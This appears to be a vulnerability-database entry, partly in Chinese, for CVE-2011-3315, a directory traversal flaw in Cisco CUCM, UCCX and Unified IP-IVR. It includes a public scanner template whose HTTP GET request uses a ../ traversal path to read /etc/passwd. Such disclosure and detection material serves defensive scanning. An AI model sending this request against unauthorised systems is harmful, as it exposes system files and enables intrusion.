CVE-2011-3315: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal

日期: 2025-08-01 | 影响软件: Cisco CUCM, UCCX, and Unified IP-IVR | POC: 已公开

漏洞描述

A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.

PoC代码[已公开]

id: CVE-2011-3315

info:
  name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files and directories on the affected system.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/36256
    - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx
    - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
    cvss-score: 7.8
    cve-id: CVE-2011-3315
    cwe-id: CWE-22
    epss-score: 0.68139
    epss-percentile: 0.98554
    cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: unified_ip_interactive_voice_response
  tags: cve,cve2011,lfi,cisco,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022071fc7997d08e7c4119b123f9b71024b3d31fb0d4c3260074300d22aa33132879022100a3f002fa9fc35b9ec9f11ce93a6a179bffc6e27416a6c698785bc67108809f21:922c64590222798bb761d5b6d8e72950

相关漏洞推荐